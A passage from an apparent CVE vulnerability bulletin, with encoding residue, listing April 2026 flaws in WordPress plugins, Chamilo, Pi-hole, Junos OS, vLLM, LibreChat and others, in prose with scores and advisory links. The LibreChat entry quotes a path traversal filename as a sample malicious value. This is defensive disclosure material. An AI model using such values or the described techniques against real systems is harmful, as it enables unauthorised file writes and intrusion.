https://www.wordfence.com/threat-intel/vulnerabilities/id/7ccb7534-b588-4b= dd-9627-0e38c0ee5e8a?source=3Dcve https://plugins.trac.wordpress.org/browser/pinterest-site-verification/tags= /1.8/PinterestMetaTagSiteVerification.php#L160 https://plugins.trac.wordpress.org/browser/pinterest-site-verification/trun= k/PinterestMetaTagSiteVerification.php#L160 https://plugins.trac.wordpress.org/browser/pinterest-site-verification/tags= /1.8/PinterestMetaTagSiteVerification.php#L172 https://plugins.trac.wordpress.org/browser/pinterest-site-verification/tags= /1.8/PinterestMetaTagSiteVerification.php#L180 https://plugins.trac.wordpress.org/browser/pinterest-site-verification/tags= /1.8/PinterestMetaTagSiteVerification.php#L92 https://plugins.trac.wordpress.org/browser/pinterest-site-verification/tags= /1.8/PinterestMetaTagSiteVerification.php#L132 https://plugins.trac.wordpress.org/browser/pinterest-site-verification/tags= /1.8/PinterestMetaTagSiteVerification.php#L214
=C2=A0 wpchill--Strong Testimonials The Strong Testimonials plugin for Word= Press is vulnerable to Stored Cross-Site Scripting via the plugin's testimo= nial_view shortcode in all versions up to, and including, 3.2.21 due to ins= ufficient input sanitization and output escaping on user supplied attribute=
s. This makes it possible for authenticated attackers, with contributor-lev=
el access and above, to inject arbitrary web scripts in pages that will exe= cute whenever a user accesses an injected page. 2026-04-08 6.4 CVE-2026-323=
9 [ https://www.cve.org/CVERecord?id=3DCVE-2026-3239 ] https://www.wordfenc= e.com/threat-intel/vulnerabilities/id/88d769cd-bea8-42e4-80a8-a77c0699b50c?= source=3Dcve https://plugins.trac.wordpress.org/changeset/3470120/strong-testimonials
=C2=A0 posimyththemes--The Plus Addons for Elementor Addons for Elementor, = Page Templates, Widgets, Mega Menu, WooCommerce The The Plus Addons for Ele= mentor - Addons for Elementor, Page Templates, Widgets, Mega Menu, WooComme= rce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via t=
he plugin's Progress Bar shortcode in all versions up to, and including, 6.= 4.9 due to insufficient input sanitization and output escaping on user supp= lied attributes. This makes it possible for authenticated attackers, with c= ontributor-level access and above, to inject arbitrary web scripts in pages=
that will execute whenever a user accesses an injected page. 2026-04-08 6.=
4 CVE-2026-3311 [ https://www.cve.org/CVERecord?id=3DCVE-2026-3311 ] https:= //www.wordfence.com/threat-intel/vulnerabilities/id/6367c5fc-f664-4105-a1b7= -a93fb0a2392b?source=3Dcve https://plugins.trac.wordpress.org/changeset/3473275/the-plus-addons-for-el= ementor-page-builder
=C2=A0 chamilo--chamilo-lms Chamilo LMS is a learning management system. Pr= ior to 2.0.0-RC.3, an Insecure Direct Object Reference (IDOR) vulnerability=
in the REST API stats endpoint allows any authenticated user (including lo= w-privilege students with ROLE_USER) to read any other user's learning prog= ress, certificates, and gradebook scores for any course, without enrollment=
or supervisory relationship. This vulnerability is fixed in 2.0.0-RC.3. 20= 26-04-10 6.5 CVE-2026-33141 [ https://www.cve.org/CVERecord?id=3DCVE-2026-3= 3141 ] https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-j2pr= -2r5w-jrpj https://github.com/chamilo/chamilo-lms/commit/792ba05953470ca971617fe2674ed= 14c1479fa80
=C2=A0 pi-hole--web Pi-hole Admin Interface is a web interface for managing=
Pi-hole, a network-level ad and internet tracker blocking application. Fro=
m 6.0 to before 6.5, a reflected DOM-based XSS vulnerability in taillog.js = allows an unauthenticated attacker to inject arbitrary HTML into the Pi-hol=
e admin interface by crafting a malicious URL. The file query parameter is = interpolated into an innerHTML assignment without escaping. Because the Con= tent-Security-Policy is missing the form-action directive, injected <form> = elements can exfiltrate credentials to an external origin. This vulnerabili=
ty is fixed in 6.5. 2026-04-06 6.1 CVE-2026-33403 [ https://www.cve.org/CVE= Record?id=3DCVE-2026-33403 ] https://github.com/pi-hole/web/security/adviso= ries/GHSA-7xqw-r9pr-qv59
=C2=A0 Elastic--Kibana Server-Side Request Forgery (CWE-918) in Kibana One = Workflow can lead to information disclosure. An authenticated user with wor= kflow creation and execution privileges can bypass host allowlist restricti= ons in the Workflows Execution Engine, potentially exposing sensitive inter= nal endpoints and data. 2026-04-08 6.8 CVE-2026-33458 [ https://www.cve.org= /CVERecord?id=3DCVE-2026-33458 ] https://discuss.elastic.co/t/kibana-9-3-3-= security-update-esa-2026-28/385815
=C2=A0 Elastic--Kibana Uncontrolled Resource Consumption (CWE-400) in Kiban=
a can lead to denial of service via Excessive Allocation (CAPEC-130). An au= thenticated user with access to the automatic import feature can submit spe= cially crafted requests with excessively large input values. When multiple = such requests are sent concurrently, the backend services become unstable, = resulting in service disruption and deployment unavailability for all users=
. 2026-04-08 6.5 CVE-2026-33459 [ https://www.cve.org/CVERecord?id=3DCVE-20= 26-33459 ] https://discuss.elastic.co/t/kibana-8-19-14-9-2-8-9-3-3-security= -update-esa-2026-26/385814
=C2=A0 chamilo--chamilo-lms Chamilo LMS is a learning management system. Pr= ior to 1.11.38, the get_user_info_from_username REST API endpoint returns p= ersonal information (email, first name, last name, user ID, active status) =
of any user to any authenticated user, including students. There is no auth= orization check. This vulnerability is fixed in 1.11.38. 2026-04-10 6.5 CVE= -2026-33708 [ https://www.cve.org/CVERecord?id=3DCVE-2026-33708 ] https://g= ithub.com/chamilo/chamilo-lms/security/advisories/GHSA-qwch-82q9-q999 https://github.com/chamilo/chamilo-lms/commit/4a119f93abbfba6fe833580f2463c= 8d4afa500c2
=C2=A0 pi-hole--pi-hole Pi-hole is a Linux network-level advertisement and = Internet tracker blocking application. Version 6.4 has a local privilege-es= calation vulnerability allows code execution as root from the low-privilege=
pihole account. Important context: the pihole account uses nologin, so thi=
s is not a direct interactive-login issue. However, nologin does not preven=
t code from running as UID pihole if a Pi-hole component is compromised. In=
that realistic post-compromise scenario, attacker-controlled content in /e= tc/pihole/versions is sourced by root-run Pi-hole scripts, leading to root = code execution. This vulnerability is fixed in 6.4.1. 2026-04-06 6.4 CVE-20= 26-33727 [ https://www.cve.org/CVERecord?id=3DCVE-2026-33727 ] https://gith= ub.com/pi-hole/pi-hole/security/advisories/GHSA-c935-8g63-qp74
=C2=A0 chamilo--chamilo-lms Chamilo LMS is a learning management system. Pr= ior to 2.0.0-RC.3, any authenticated user (including ROLE_STUDENT) can enum= erate all platform users and access personal information (email, phone, rol= es) via GET /api/users, including administrator accounts. This vulnerabilit=
y is fixed in 2.0.0-RC.3. 2026-04-10 6.5 CVE-2026-33736 [ https://www.cve.o= rg/CVERecord?id=3DCVE-2026-33736 ] https://github.com/chamilo/chamilo-lms/s= ecurity/advisories/GHSA-fp2p-fj6c-x3x9 https://github.com/chamilo/chamilo-lms/commit/1739371ce1c562c007c7f5d53e6d6= 5b7a4ff4109
=C2=A0 trailofbits--rfc3161-client rfc3161-client is a Python library imple= menting the Time-Stamp Protocol (TSP) described in RFC 3161. Prior to 1.0.6=
, an Authorization Bypass vulnerability in rfc3161-client's signature verif= ication allows any attacker to impersonate a trusted TimeStamping Authority=
(TSA). By exploiting a logic flaw in how the library extracts the leaf cer= tificate from an unordered PKCS#7 bag of certificates, an attacker can appe=
nd a spoofed certificate matching the target common_name and Extended Key U= sage (EKU) requirements. This tricks the library into verifying these autho= rization rules against the forged certificate while validating the cryptogr= aphic signature against an actual trusted TSA (such as FreeTSA), thereby by= passing the intended TSA authorization pinning entirely. This vulnerability=
is fixed in 1.0.6. 2026-04-08 6.2 CVE-2026-33753 [ https://www.cve.org/CVE= Record?id=3DCVE-2026-33753 ] https://github.com/trailofbits/rfc3161-client/= security/advisories/GHSA-3xxc-pwj6-jgrj
=C2=A0 Juniper Networks--Junos OS An Improper Check for Unusual or Exceptio= nal Conditions vulnerability in the packet forwarding engine (pfe) of Junip=
er Networks Junos OS on MX Series allows an unauthenticated, network-based = attacker to bypass the configured firewall filter and access the control-pl= ane of the device. On MX platforms with MPC10, MPC11, LC4800 or LC9600 line=
cards, and MX304, firewall filters applied on a loopback interface lo0.n (= where n is a non-0 number) don't get executed when lo0.n is in the global V=
RF / default routing-instance. An affected configuration would be: user@hos=
t# show configuration interfaces lo0 | display set set interfaces lo0 unit =
1 family inet filter input <filter-name> where a firewall filter is applied=
to a non-0 loopback interface, but that loopback interface is not referred=
to in any routing-instance (RI) configuration, which implies that it's use=
d in the default RI. The issue can be observed with the CLI command: user@d= evice> show firewall counter filter <filter_name> not showing any matches. = This issue affects Junos OS on MX Series: * all versions before 23.2R2-S6, =
* 23.4 versions before 23.4R2-S7, * 24.2 versions before 24.2R2, * 24.4 ver= sions before 24.4R2. 2026-04-09 6.5 CVE-2026-33774 [ https://www.cve.org/CV= ERecord?id=3DCVE-2026-33774 ] https://kb.juniper.net/JSA107865
=C2=A0 Juniper Networks--Junos OS A Missing Release of Memory after Effecti=
ve Lifetime vulnerability in the BroadBand Edge subscriber management daemo=
n (bbe-smgd) of Juniper Networks Junos OS on MX Series allows an adjacent, = unauthenticated attacker to cause a Denial of Service (DoS). If the authent= ication packet-type option is configured and a received packet does not mat=
ch that packet type, the memory leak occurs. When all memory available to b= be-smgd=C2=A0has been consumed, no new subscribers will be able to login. T=
he memory utilization of bbe-smgd can be monitored with the following show = command: user@host> show system processes extensive | match bbe-smgd The be= low log message can be observed when this limit has been reached: bbesmgd[<= PID>]: %DAEMON-3-SMD_DPROF_RSMON_ERROR: Resource unavailability, Reason: Da= emon Heap Memory exhaustion This issue affects Junos OS on MX Series: * all=
versions before 22.4R3-S8, * 23.2 versions before 23.2R2-S5, * 23.4 versio=
ns before 23.4R2-S6, * 24.2 versions before 24.2R2-S2, * 24.4 versions befo=
re 24.4R2, * 25.2 versions before 25.2R2. 2026-04-09 6.5 CVE-2026-33775 [ h= ttps://www.cve.org/CVERecord?id=3DCVE-2026-33775 ] https://kb.juniper.net/J= SA107821
=C2=A0 Juniper Networks--Junos OS An Improper Following of a Certificate's = Chain of Trust vulnerability in J-Web of Juniper Networks Junos OS on SRX S= eries allows a PITM to intercept the communication of the device and get ac= cess to confidential information and potentially modify it. When an SRX dev= ice is provisioned to connect to Security Director (SD) cloud, it doesn't p= erform sufficient verification of the received server certificate. This all= ows a PITM to intercept the communication between the SRX and SD cloud and = access credentials and other sensitive information. This issue affects Juno=
s OS: * all versions before 22.4R3-S9, * 23.2 versions before 23.2R2-S6, * = 23.4 versions before 23.4R2-S7, * 24.2 versions before 24.2R2-S3, * 24.4 ve= rsions before 24.4R2-S2, * 25.2 versions before 25.2R1-S2, 25.2R2. 2026-04-=
09 6.5 CVE-2026-33779 [ https://www.cve.org/CVERecord?id=3DCVE-2026-33779 ]=
https://kb.juniper.net/JSA107823
=C2=A0 Juniper Networks--Junos OS A Missing Release of Memory after Effecti=
ve Lifetime vulnerability in the=C2=A0Layer 2 Address Learning Daemon (l2al=
d) of Juniper Networks Junos OS and Junos OS Evolved allows an adjacent, un= authenticated attacker to cause a memory leak ultimately leading to a Denia=
l of Service (DoS). In an EVPN-MPLS scenario, routes learned from remote mu= lti-homed Provider Edge (PE) devices are programmed as ESI routes. Due to a=
logic issue in the l2ald memory management, memory allocated for these rou= tes is not released when there is churn for these routes. As a result, memo=
ry leaks in the l2ald process which will ultimately lead to a crash and res= tart of l2ald. Use the following command to monitor the memory consumption =
by l2ald: user@device> show system process extensive | match "PID|l2ald" Th=
is issue affects: Junos OS: * all versions before 22.4R3-S5, * 23.2 version=
s before 23.2R2-S3, * 23.4 versions before 23.4R2-S4, * 24.2 versions befor=
e 24.2R2; Junos OS Evolved: * all versions before 22.4R3-S5-EVO, * 23.2 ver= sions before 23.2R2-S3-EVO, * 23.4 versions before 23.4R2-S4-EVO, * 24.2 ve= rsions before 24.2R2-EVO. 2026-04-09 6.5 CVE-2026-33780 [ https://www.cve.o= rg/CVERecord?id=3DCVE-2026-33780 ] https://kb.juniper.net/JSA107819
=C2=A0 Juniper Networks--Junos OS An Improper Check for Unusual or Exceptio= nal Conditions vulnerability in the packet forwarding engine (pfe) of Junip=
er Networks Junos OS on specific EX and QFX Series devices allow an unauthe= nticated, adjacent attacker to cause a complete Denial of Service (DoS). On=
EX4k, and QFX5k platforms configured as service-provider edge devices, if = L2PT is enabled on the UNI and VSTP is enabled on NNI in VXLAN scenarios, r= eceiving VSTP BPDUs on UNI leads to packet buffer allocation failures, resu= lting in the device to not pass traffic anymore until it is manually recove= red with a restart.This issue affects Junos OS: * 24.4 releases before 24.4= R2, * 25.2 releases before 25.2R1-S1, 25.2R2. This issue does not affect Ju= nos OS releases before 24.4R1. 2026-04-09 6.5 CVE-2026-33781 [ https://www.= cve.org/CVERecord?id=3DCVE-2026-33781 ] https://kb.juniper.net/JSA107869
=C2=A0 Juniper Networks--Junos OS A Missing Release of Memory after Effecti=
ve Lifetime vulnerability in the DHCP daemon (jdhcpd) of Juniper Networks J= unos OS on MX Series, allows an adjacent, unauthenticated attacker to cause=
a memory leak, that will eventually cause a complete Denial-of-Service (Do= S). In a DHCPv6 over PPPoE, or=C2=A0DHCPv6 over VLAN=C2=A0with Active lease=
query or Bulk lease query scenario, every subscriber logout will leak a sm= all amount of memory. When all available memory has been exhausted, jdhcpd = will crash and restart which causes a complete service impact until the pro= cess has recovered. The memory usage of jdhcpd can be monitored with: user@= host> show system processes extensive | match jdhcpd This issue affects Jun=
os OS: * all versions before 22.4R3-S1, * 23.2 versions before 23.2R2, * 23=
.4 versions before 23.4R2. 2026-04-09 6.5 CVE-2026-33782 [ https://www.cve.= org/CVERecord?id=3DCVE-2026-33782 ] https://kb.juniper.net/JSA107820
=C2=A0 Juniper Networks--Junos OS Evolved A Function Call With Incorrect Ar= gument Type vulnerability in the sensor interface of Juniper Networks Junos=
OS Evolved on PTX Series allows a network-based, authenticated attacker wi=
th low privileges to cause a complete Denial of Service (DoS). If colored S= RTE policy tunnels are provisioned via PCEP, and gRPC is used to monitor tr= affic in these tunnels, evo-aftmand crashes and doesn't restart which leads=
to a complete and persistent service impact. The system has to be manually=
restarted to recover. The issue is seen only when the Originator ASN field=
in PCEP contains a value larger than 65,535 (32-bit ASN). The issue is not=
reproducible when SRTE policy tunnels are statically configured. This issu=
e affects Junos OS Evolved on PTX Series:=C2=A0 * all versions before 22.4R= 3-S9-EVO, * 23.2 versions before 23.2R2-S6-EVO, * 23.4 versions before 23.4= R2-S7-EVO, * 24.2 versions before 24.2R2-S4-EVO, * 24.4 versions before 24.= 4R2-S2-EVO, * 25.2 versions before 25.2R1-S2-EVO, 25.2R2-EVO. 2026-04-09 6.=
5 CVE-2026-33783 [ https://www.cve.org/CVERecord?id=3DCVE-2026-33783 ] http= s://kb.juniper.net/JSA107870
=C2=A0 Juniper Networks--Junos OS An OS Command Injection vulnerability in = the CLI processing of Juniper Networks Junos OS and Junos OS Evolved allows=
a local, high-privileged attacker executing specific, crafted CLI commands=
to inject arbitrary shell commands as root, leading to a complete compromi=
se of the system. Certain 'set system' commands, when executed with crafted=
arguments, are not properly sanitized, allowing for arbitrary shell inject= ion. These shell commands are executed as root, potentially allowing for co= mplete control of the vulnerable system. This issue affects: Junos OS:=C2=
=A0 * all versions before 22.4R3-S8,=C2=A0 * from 23.2 before 23.2R2-S5,=C2= =A0 * from 23.4 before 23.4R2-S7,=C2=A0 * from 24.2 before 24.2R2-S2,=C2=A0=
* from 24.4 before 24.4R2,=C2=A0 * from 25.2 before 25.2R2;=C2=A0 Junos OS=
Evolved:=C2=A0 * all versions before 22.4R3-S8-EVO,=C2=A0 * from 23.2 befo=
re 23.2R2-S5-EVO,=C2=A0 * from 23.4 before 23.4R2-S7-EVO,=C2=A0 * from 24.2=
before 24.2R2-S2-EVO,=C2=A0 * from 24.4 before 24.4R2-EVO,=C2=A0 * from 25=
.2 before 25.2R1-S1-EVO, 25.2R2-EVO. 2026-04-09 6.7 CVE-2026-33791 [ https:= //www.cve.org/CVERecord?id=3DCVE-2026-33791 ] https://kb.juniper.net/JSA107= 875
=C2=A0 danny-avila--LibreChat LibreChat is a ChatGPT clone with additional = features. Prior to 0.8.4, LibreChat trusts the name field returned by the e= xecute_code sandbox when persisting code-generated artifacts. On deployment=
s using the default local file strategy, a malicious artifact filename cont= aining traversal sequences (for example, ../../../../../app/client/dist/poc= .txt) is concatenated into the server-side destination path and written wit=
h fs.writeFileSync() without sanitization. This gives any user who can trig= ger execute_code an arbitrary file write primitive as the LibreChat server = user. This vulnerability is fixed in 0.8.4. 2026-04-07 6.3 CVE-2026-34371 [=
https://www.cve.org/CVERecord?id=3DCVE-2026-34371 ] https://github.com/dan= ny-avila/LibreChat/security/advisories/GHSA-qrm5-r67f-6692
=C2=A0 AcademySoftwareFoundation--openexr OpenEXR provides the specificatio=
n and reference implementation of the EXR file format, an image storage for= mat for the motion picture industry. From 3.4.0 to before 3.4.9, a missing = bounds check on the dataWindow attribute in EXR file headers allows an atta= cker to trigger a signed integer overflow in generic_unpack(). By setting d= ataWindow.min.x to a large negative value, OpenEXRCore computes an enormous=
image width, which is later used in a signed integer multiplication that o= verflows, causing the process to terminate with SIGILL via UBSan. This vuln= erability is fixed in 3.4.9. 2026-04-06 6.5 CVE-2026-34378 [ https://www.cv= e.org/CVERecord?id=3DCVE-2026-34378 ] https://github.com/AcademySoftwareFou= ndation/openexr/security/advisories/GHSA-v76p-4qvv-vh4g https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.4.9
=C2=A0 vllm-project--vllm vLLM is an inference and serving engine for large=
language models (LLMs). From 0.7.0 to before 0.19.0, the VideoMediaIO.load= _base64() method at vllm/multimodal/media/video.py splits video/jpeg data U= RLs by comma to extract individual JPEG frames, but does not enforce a fram=
e count limit. The num_frames parameter (default: 32), which is enforced by=
the load_bytes() code path, is completely bypassed in the video/jpeg base6=
4 path. An attacker can send a single API request containing thousands of c= omma-separated base64-encoded JPEG frames, causing the server to decode all=
frames into memory and crash with OOM. This vulnerability is fixed in 0.19= .0. 2026-04-06 6.5 CVE-2026-34755 [ https://www.cve.org/CVERecord?id=3DCVE-= 2026-34755 ] https://github.com/vllm-project/vllm/security/advisories/GHSA-= pq5c-rjhq-qp7p
=C2=A0 vllm-project--vllm vLLM is an inference and serving engine for large=
language models (LLMs). From 0.1.0 to before 0.19.0, a Denial of Service v= ulnerability exists in the vLLM OpenAI-compatible API server. Due to the la=
ck of an upper bound validation on the n parameter in the ChatCompletionReq= uest and CompletionRequest Pydantic models, an unauthenticated attacker can=
send a single HTTP request with an astronomically large n value. This comp= letely blocks the Python asyncio event loop and causes immediate Out-Of-Mem= ory crashes by allocating millions of request object copies in the heap bef= ore the request even reaches the scheduling queue. This vulnerability is fi= xed in 0.19.0. 2026-04-06 6.5 CVE-2026-34756 [ https://www.cve.org/CVERecor= d?id=3DCVE-2026-34756 ] https://github.com/vllm-project/vllm/security/advis= ories/GHSA-3mwp-wvh9-7528
https://github.com/vllm-project/vllm/pull/37952 https://github.com/vllm-project/vllm/commit/b111f8a61f100fdca08706f41f29ef3= 548de7380
=C2=A0 electron--electron Electron is a framework for writing cross-platfor=
m desktop applications using JavaScript, HTML and CSS. Prior to 39.8.5, 40.= 8.5, 41.1.0, and 42.0.0-alpha.5, when a renderer calls window.open() with a=
target name, Electron did not correctly scope the named-window lookup to t=
he opener's browsing context group. A renderer could navigate an existing c= hild window that was opened by a different, unrelated renderer if both used=
the same target name. If that existing child was created with more permiss= ive webPreferences (via setWindowOpenHandler's overrideBrowserWindowOptions=
), content loaded by the second renderer inherits those permissions. Apps a=
re only affected if they open multiple top-level windows with differing tru=
st levels and use setWindowOpenHandler to grant child windows elevated webP= references such as a privileged preload script. Apps that do not elevate ch= ild window privileges, or that use a single top-level window, are not affec= ted. Apps that additionally grant nodeIntegration: true or sandbox: false t=
o child windows (contrary to the security recommendations) may be exposed t=
o arbitrary code execution. This vulnerability is fixed in 39.8.5, 40.8.5, = 41.1.0, and 42.0.0-alpha.5. 2026-04-07 6 CVE-2026-34765 [ https://www.cve.o= rg/CVERecord?id=3DCVE-2026-34765 ] https://github.com/electron/electron/sec= urity/advisories/GHSA-f3pv-wv63-48x8
=C2=A0 burlingtonbytes--WP Blockade Visual Page Builder The WP Blockade plu= gin for WordPress is vulnerable to Missing Authorization in all versions up=
to and including 0.9.14. The plugin registers an admin_post action hook 'w= p-blockade-shortcode-render' that maps to the render_shortcode_preview() fu= nction. This function lacks any capability check (current_user_can()) and n= once verification, allowing any authenticated user to execute arbitrary Wor= dPress shortcodes. The function takes a user-supplied 'shortcode' parameter=
from $_GET, passes it through stripslashes(), and directly executes it via=
do_shortcode(). This makes it possible for authenticated attackers, with S= ubscriber-level access and above, to execute arbitrary shortcodes, which co= uld lead to information disclosure, privilege escalation, or other impacts = depending on what shortcodes are registered on the site (e.g., shortcodes f= rom other plugins that display sensitive data, perform actions, or include = files). 2026-04-08 6.5 CVE-2026-3480 [ https://www.cve.org/CVERecord?id=3DC= VE-2026-3480 ] https://www.wordfence.com/threat-intel/vulnerabilities/id/3f= 159aac-092b-4655-9d97-a496ac01738c?source=3Dcve https://plugins.trac.wordpress.org/browser/wp-blockade/trunk/wp-blockade.ph= p#L393 https://plugins.trac.wordpress.org/browser/wp-blockade/tags/0.9.14/wp-block= ade.php#L393 https://plugins.trac.wordpress.org/browser/wp-blockade/trunk/wp-blockade.ph= p#L361 https://plugins.trac.wordpress.org/browser/wp-blockade/tags/0.9.14/wp-block= ade.php#L361 https://plugins.trac.wordpress.org/browser/wp-blockade/trunk/wp-blockade.ph= p#L112 https://plugins.trac.wordpress.org/browser/wp-blockade/tags/0.9.14/wp-block= ade.php#L112
=C2=A0 David Lingren--Media LIbrary Assistant Improper Neutralization of In= put During Web Page Generation ('Cross-site Scripting') vulnerability in Da= vid Lingren Media LIbrary Assistant allows Stored XSS.This issue affects Me= dia LIbrary Assistant: from n/a through 3.34. 2026-04-06 6.5 CVE-2026-34897=
[ https://www.cve.org/CVERecord?id=3DCVE-2026-34897 ] https://patchstack.c= om/database/wordpress/plugin/media-library-assistant/vulnerability/wordpres= s-media-library-assistant-plugin-3-34-cross-site-scripting-xss-vulnerabilit= y?_s_id=3Dcve
=C2=A0 Red Hat--mirror registry for Red Hat OpenShift A flaw was found in t=
he OpenShift Mirror Registry. This vulnerability allows an unauthenticated,=
remote attacker to enumerate valid usernames and email addresses via diffe= rent error messages during authentication failures and account creation. 20= 26-04-08 5.3 CVE-2025-14243 [ https://www.cve.org/CVERecord?id=3DCVE-2025-1= 4243 ] https://access.redhat.com/security/cve/CVE-2025-14243
RHBZ#2419829 [ https://bugzilla.redhat.com/show_bug.cgi?id=3D2419829 ]
=C2=A0 inisev--BackupBliss Backup & Migration with Free Cloud Storage The B= ackup Migration plugin for WordPress is vulnerable to Missing Authorization=
in all versions up to, and including, 2.0.0. This is due to a missing capa= bility check on the 'initializeOfflineAjax' function and lack of proper non=
ce verification. The endpoint only validates against hardcoded tokens which=
are publicly exposed in the plugin's JavaScript. This makes it possible fo=
r unauthenticated attackers to trigger the backup upload queue processing, = potentially causing unexpected backup transfers to configured cloud storage=
targets and resource exhaustion. 2026-04-07 5.3 CVE-2025-14944 [ https://w= ww.cve.org/CVERecord?id=3DCVE-2025-14944 ] https://www.wordfence.com/threat= -intel/vulnerabilities/id/a2a41a15-0743-48cc-8c92-7cb839fa5847?source=3Dcve https://plugins.trac.wordpress.org/browser/backup-backup/trunk/includes/off= line.php#L29 https://plugins.trac.wordpress.org/browser/backup-backup/trunk/includes/aja= x_offline.php#L112 https://plugins.trac.wordpress.org/changeset?old=3D3386897&old_path=3Dbacku= p-backup%2Ftags%2F2.0.0%2Fincludes%2Foffline.php&new=3D3449635&new_path=3Db= ackup-backup%2Ftags%2F2.1.0%2Fincludes%2Foffline.php
=C2=A0 johanaarstein--AM LottiePlayer The AM LottiePlayer plugin for WordPr= ess is vulnerable to Stored Cross-Site Scripting via uploaded SVG files in = all versions up to, and including, 3.6.0 due to insufficient input sanitiza= tion and output escaping. This makes it possible for authenticated attacker=
s, with Author-level access and above, to inject arbitrary web scripts in p= ages that will execute whenever a user accesses an injected page. 2026-04-0=
8 5.4 CVE-2025-1794 [ https://www.cve.org/CVERecord?id=3DCVE-2025-1794 ] ht= tps://www.wordfence.com/threat-intel/vulnerabilities/id/ef2f1ad1-1e2e-4b56-= b16c-d87956b142ad?source=3Dcve https://plugins.trac.wordpress.org/browser/am-lottieplayer/tags/3.5.0/inclu= des/upload-thumbnail.php
=C2=A0 Hitachi--JP1/IT Desktop Management 2 - Manager Buffer Overflow Vulne= rability in JP1/IT Desktop Management 2 - Manager on Windows, JP1/IT Deskto=
p Management 2 - Operations Director on Windows, Job Management Partner 1/I=
T Desktop Management 2 - Manager on Windows, JP1/IT Desktop Management - Ma= nager on Windows, Job Management Partner 1/IT Desktop Management - Manager =
on Windows, JP1/NETM/DM Manager on Windows, JP1/NETM/DM Client on Windows, = Job Management Partner 1/Software Distribution Manager on Windows, Job Mana= gement Partner 1/Software Distribution Client on Windows.This issue affects=
JP1/IT Desktop Management 2 - Manager: from 13-50 before 13-50-02, from 13= -11 before 13-11-04, from 13-10 before 13-10-07, from 13-01 before 13-01-07=
, from 13-00 before 13-00-05, from 12-60 before 12-60-12, from 10-50 throug=
h 12-50-11; JP1/IT Desktop Management 2 - Operations Director: from 13-50 b= efore 13-50-02, from 13-11 before 13-11-04, from 13-10 before 13-10-07, fro=
m 13-01 before 13-01-07, from 13-00 before 13-00-05, from 12-60 before 12-6= 0-12, from 10-50 through 12-50-11; Job Management Partner 1/IT Desktop Mana= gement 2 - Manager: from 10-50 through 10-50-11; JP1/IT Desktop Management =
- Manager: from 09-50 through 10-10-16; Job Management Partner 1/IT Desktop=
Management - Manager: from 09-50 through 10-10-16; JP1/NETM/DM Manager: fr=
om 09-00 through 10-20-02; JP1/NETM/DM Client: from 09-00 through 10-20-02;=
Job Management Partner 1/Software Distribution Manager: from 09-00 through=
09-51-13; Job Management Partner 1/Software Distribution Client: from 09-0=
0 through 09-51-13. 2026-04-07 5.5 CVE-2025-65116 [ https://www.cve.org/CVE= Record?id=3DCVE-2025-65116 ] https://www.hitachi.com/products/it/software/s= ecurity/info/vuls/hitachi-sec-2026-118/index.html
=C2=A0 vsourz1td--Advanced Contact form 7 DB The Advanced Contact form 7 DB=
plugin for WordPress is vulnerable to Cross-Site Request Forgery in all ve= rsions up to, and including, 2.0.9. This is due to missing or incorrect non=
ce validation on the 'vsz_cf7_save_setting_callback' function. This makes i=
t possible for unauthenticated attackers to delete form entry via a forged = request granted they can trick a site administrator into performing an acti=
on such as clicking on a link. 2026-04-08 5.4 CVE-2026-0811 [ https://www.c= ve.org/CVERecord?id=3DCVE-2026-0811 ] https://www.wordfence.com/threat-inte= l/vulnerabilities/id/88097744-d2f5-4ae5-aa71-0f4a0decd911?source=3Dcve https://plugins.trac.wordpress.org/browser/advanced-cf7-db/tags/2.0.9/admin= /class-advanced-cf7-db-admin.php#L885 https://plugins.trac.wordpress.org/changeset/3497481/advanced-cf7-db
=C2=A0 GitLab--GitLab GitLab has remediated an issue in GitLab EE affecting=
all versions from 18.0.0 before 18.8.9, 18.9 before 18.9.5, and 18.10 befo=
re 18.10.3 that in Code Quality reports could have allowed an authenticated=
user to leak IP addresses of users viewing the report via specially crafte=
d content. 2026-04-08 5.7 CVE-2026-1516 [ https://www.cve.org/CVERecord?id= =3DCVE-2026-1516 ] HackerOne Bug Bounty Report #3514461 [ https://hackerone= .com/reports/3514461 ]
https://gitlab.com/gitlab-org/gitlab/-/work_items/587893 https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-r= eleased/
=C2=A0 wpmudev--Hustle Email Marketing, Lead Generation, Optins, Popups The=
Hustle - Email Marketing, Lead Generation, Optins, Popups plugin for WordP= ress is vulnerable to unauthorized modification of data due to a missing ca= pability check on the 'hustle_module_converted' AJAX action in all versions=
up to, and including, 7.8.10.2. This makes it possible for unauthenticated=
attackers to forge conversion tracking events for any Hustle module, inclu= ding draft modules that are never displayed to users, thereby manipulating = marketing analytics and conversion statistics. 2026-04-07 5.3 CVE-2026-2263=
[ https://www.cve.org/CVERecord?id=3DCVE-2026-2263 ] https://www.wordfence= .com/threat-intel/vulnerabilities/id/2305462c-0a00-4423-8dc2-e32628c4864d?s= ource=3Dcve https://plugins.trac.wordpress.org/browser/wordpress-popup/tags/7.8.9.3/inc= /front/hustle-module-front-ajax.php#L32 https://plugins.trac.wordpress.org/browser/wordpress-popup/tags/7.8.9.3/inc= /front/hustle-module-front-ajax.php#L1047 https://plugins.trac.wordpress.org/browser/wordpress-popup/tags/7.8.9.3/inc= /front/hustle-module-front.php#L311 https://plugins.trac.wordpress.org/changeset?old_path=3D/wordpress-popup/ta= gs/7.8.10.2&new_path=3D/wordpress-popup/tags/7.8.11
=C2=A0 OCS Inventory--OCS Inventory NG Server OCS Inventory NG Server versi=
on 2.12.3 and prior contain a stored cross-site scripting vulnerability tha=
t allows unauthenticated attackers to execute arbitrary JavaScript by submi= tting malicious User-Agent HTTP headers to the /ocsinventory endpoint. Atta= ckers can register rogue agents or craft requests with malicious User-Agent=
values that are stored without sanitation and rendered with insufficient e= ncoding in the web console, leading to arbitrary JavaScript execution in th=
e browsers of authenticated users viewing the statistics dashboard. 2026-04= -06 5.4 CVE-2026-22675 [ https://www.cve.org/CVERecord?id=3DCVE-2026-22675 =
] https://github.com/OCSInventory-NG/OCSInventory-Server/pull/483 https://github.com/OCSInventory-NG/OCSInventory-Server/commit/78faf2ca8b897= 141ba4d337d75692ab8e405bd4e https://www.vulncheck.com/advisories/ocs-inventory-ng-server-stored-xss-via= -user-agent
=C2=A0 Volcengine--OpenViking OpenViking versions prior to 0.3.3 contain a = missing authorization vulnerability in the task polling endpoints that allo=
ws unauthorized attackers to enumerate or retrieve background task metadata=
